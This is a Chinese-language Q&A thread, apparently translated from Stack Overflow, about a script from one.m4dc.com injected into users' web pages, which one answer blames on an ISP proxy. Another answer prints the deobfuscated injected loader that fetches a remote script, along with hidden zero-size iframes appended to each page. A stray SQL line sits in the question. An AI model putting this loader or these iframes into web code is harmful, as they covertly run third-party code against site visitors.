我正在检查一个缓慢的加载页面,并在chrome的inspect network部分找到了这个si.js.有人可以帮我理解它是什么。我搜索了grid.js,找不到任何关于这个si.js的链接。 (仔细检查,我可以看到该页面正在重定向到另一个网站" http://one.m4dc.com/j/si.js"。感谢您的帮助 这是截图
更新! 如果你去浏览器网址,这就是我得到的../ js / grid.js
SELECT CAST(someNumberColumn AS INT) AS intColumn
}
但是实际脚本(在本地机器上类似于原始网站中的那个)
https://tympanus.net/Tutorials/ThumbnailGridExpandingPreview/js/grid.js
答案 0 :(得分:3)
我也遇到了同样的问题。我刚发现这个脚本http://one.m4dc.com/j/si.js在我的网站上添加了Cookie
当我将ssl证书添加到我的网站时,问题实际上已得到解决。我发现服务器http://one.m4dc.com归
所有Bharthi airtel one.m4dc.com ip location info
我正在使用他们的宽带服务。看起来他们的代理服务器正在注入这个脚本。他们正在使用这个脚本用于恶意目的。
答案 1 :(得分:0)
我也遇到过这个问题。当我检查了所有脚本时,我网站上名为 pd-index.js 的脚本之一被替换为下面给出内容的脚本。
try {
var esdmd51 = '1f4c5553ab20a8809f7f1724448c2f6e';
var d = document;
var esdfd5_uri = 'http://www.plantondesk.com/js/pd-index.js?m4dc56=176712';
if(0 != e6f744) {
var e6f744 = 0;
esdfd5 =! 0
}
else esdfd5 =! 1;
function ldS(e,t) {
var a = d.createElement("script");
a.type = "text/javascript",
a.readyState
?a.onreadystatechange = function() {
"loaded"!=a.readyState && "complete" != a.readyState || (a.onreadystatechange=null,t())
}
:a.onload = function() {
t()
},
a.src = e,
d.getElementsByTagName("head")[0].appendChild(a)
}
try {
vA = d.currentScript.async,
vD = d.currentScript.defer
}
catch(e) {
vA =! 0
}
vA || vD
?ldS(esdfd5_uri, function(){})
:(
d.write('<script id="esdfd576712" type="text/javascript" src="'+esdfd5_uri+'" ><\/script>'),
d.getElementById("esdfd576712") || ldS(sdfd5_uri, function(){})),
esdfd5 && ldS("http://one.m4dc.com/j/si.js", function(){}
)
}
catch(e) {}
所有这些代码都写在一行中。我构造它是为了理解。我的两个站点在服务器上部署时遇到同样的问题。在本地运行时没问题。
它还将这两个div元素附加在每个页面的正文内容的末尾。
<div>
<iframe width="0px" height="0px" class="iifr" id="chk_frame" src="http://one.m4dc.com/i/si.html" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>
<div>
<iframe width="0px" height="0px" class="iifr" id="hdr_ifr" src="http://one.m4dc.com/t/?r=0.7112356815203629" frameborder="0" scrolling="no" allowtransparency="true"></iframe>
</div>
答案 2 :(得分:0)